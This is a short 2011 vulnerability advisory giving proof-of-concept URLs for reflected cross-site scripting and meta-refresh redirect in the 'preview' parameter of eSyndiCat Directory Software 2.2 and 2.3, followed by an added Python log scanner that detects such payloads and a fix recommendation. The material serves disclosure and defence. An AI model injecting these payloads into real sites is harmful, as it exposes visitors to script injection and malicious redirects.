eSyndiCat Directory Software (preview=) versions 2.2 and 2.3 - Cross-Site Scripting (XSS) & Redirect

http://www.esyndicat.com 
 
30 - 01 - 2011  
 
Avram Marius ( d3v1l )  
 
http://twitter.com/securityshell  -  http://security-sh3ll.blogspot.com

--------------------------------------------------------------------------
PoC 1: XSS & Redirect on v2.3
 
http://www.esyndicat.com/demo/?preview="><script>alert('XSS')</script> 
 
http://www.esyndicat.com/demo/?preview="><meta http-equiv="Refresh" content="0;url=http://www.google.com/"> ""
 
--------------------------------------------------------------------------
 
PoC 2: XSS & Redirect on v2.2

http://ekedai.net/date/2008/08/?preview="><script>alert('XSS')</script>
 
http://ekedai.net/date/2008/08/?preview="><meta http-equiv="Refresh" content="0;url=http://www.google.com/"> ""

--------------------------------------------------------------------------
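
Both PoCs work because the preview value is reflected without HTML encoding, so `">` closes the surrounding attribute and tag. The following is an added detection example (not part of the original advisory or of eSyndiCat) that scans web access logs for such preview values; the combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[0-9.]+"')
# Characters that let a reflected value leave an attribute or open a tag.
BREAKOUT = re.compile(r'[<>"\']')
SCRIPT_TAG = re.compile(r'<script\b', re.I)
META_REFRESH = re.compile(r'<meta[^>]+http-equiv\s*=\s*["\']?refresh', re.I)

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [30/Jan/2011:10:00:01 +0000] "GET /demo/?preview=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [30/Jan/2011:10:00:05 +0000] "GET /demo/?preview=%22%3E%3Cscript%3E'
    'alert(%27XSS%27)%3C/script%3E HTTP/1.1" 200 5177',
    '198.51.100.9 - - [30/Jan/2011:10:01:12 +0000] "GET /demo/?preview=%22%3E%3Cmeta%20'
    'http-equiv=%22Refresh%22%20content=%220;url=http://www.google.com/%22%3E HTTP/1.1" 200 5201',
    '198.51.100.9 - - [30/Jan/2011:10:02:40 +0000] "GET /demo/?preview=%2522%253E%253Cb%253E'
    ' HTTP/1.1" 200 5130',
]

def classify_preview(value):
    """Return None for a benign value, else a label for the injected markup."""
    # Decode once more so double-encoded input (%253C for '<') is not missed.
    value = unquote(value)
    if not BREAKOUT.search(value):
        return None
    if SCRIPT_TAG.search(value):
        return "script-injection"
    if META_REFRESH.search(value):
        return "meta-refresh-redirect"
    return "markup-breakout"

def scan(log_lines, param="preview"):
    """Return (line number, label, decoded value) for each suspicious request."""
    findings = []
    for lineno, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        # parse_qsl percent-decodes the value once.
        for name, value in parse_qsl(query, keep_blank_values=True):
            label = classify_preview(value) if name.lower() == param else None
            if label:
                findings.append((lineno, label, value))
    return findings
```

Detection only covers requests that were logged; the fix on the application side is to HTML-encode the preview value (including quotes) before writing it into the page.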